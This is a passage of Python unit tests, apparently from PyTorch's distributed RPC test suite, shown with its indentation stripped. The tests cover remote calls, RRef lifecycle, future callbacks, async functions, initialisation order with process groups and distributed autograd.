self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
AttributeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
class ProcessGroupAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# ProcessGroupRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `ProcessGroupRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.init_method
)
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIn(
"To silence this warning pass `backend=BackendType.PROCESS_GROUP` explicitly.",
"\n".join(cm.output),
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.ProcessGroupAgent)
def test_logs_deprecation_warning(self):
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=self.rpc_backend_options,
)
self.assertIn(
"It is recommended to migrate to the TENSORPIPE backend.",
"\n".join(cm.output),
)
@skip_if_lt_x_gpu(2)
@dist_init
def test_cuda(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(3, 3).cuda(0)
t2 = torch.rand(3, 3).cuda(1)
t3 = torch.rand(3, 3)
# cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t2))
# mix of cpu and cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t3))
# gpu tensor list as args fails.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._gpu_tensor_list_arg, args=([t1, t2]))
# cuda tensors as return values fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor, args=())
# cuda tensors as a list of return value fails
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor_list, args=())
# Sending to self should fail too.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(worker_name(self.rank), torch.add, args=(t1, t2))
def test_single_threaded_rref_owner(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# makes sure there is no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# using RRefs on dst
futs = []
for i in range(len(rrefs)):
futs.append(
rpc.rpc_async(dst, my_rref_function, args=(rrefs[i], rrefs[i]))
)
# wait for results and check
for i in range(len(futs)):
self.assertEqual(2 * (torch.zeros(2, 2) + i), futs[i].wait())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(futs), num_owner_rrefs)
# trigger RRef deletion
del futs
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown occupies the
# only thread on callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
def test_single_threaded_rref_to_here(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# makes sure there is no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# wait for results and check
for i in range(len(rrefs)):
self.assertEqual(torch.zeros(2, 2) + i, rrefs[i].to_here())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(rrefs), num_owner_rrefs)
# trigger RRef deletion
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown occupies the
# only thread on callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
@dist_init
def test_process_group_debug_info(self):
rpc.enable_gil_profiling(True)
initialize_pg(self.file_init_method, self.rank, self.world_size)
NUM_THREAD = self.rpc_backend_options.num_send_recv_threads
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# for the above check, add a barrier to ensure that another worker
# cannot send a request before we check num_idle_threads, since we'd
# use up an idle thread if we start processing that request.
dist.barrier()
dst_rank = (self.rank + 1) % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank), set_and_check_done, args=(dst_rank,)
)
# blocks until the request arrives
self.assertEqual(self.rank, VALUE_FUTURE.result())
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertGreaterEqual(float(info["agent.gil_average_wait_time_us"]), 0)
